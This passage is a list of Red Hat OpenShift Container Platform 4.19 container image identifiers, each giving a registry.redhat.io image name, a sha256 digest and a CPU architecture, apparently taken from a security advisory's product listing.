"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
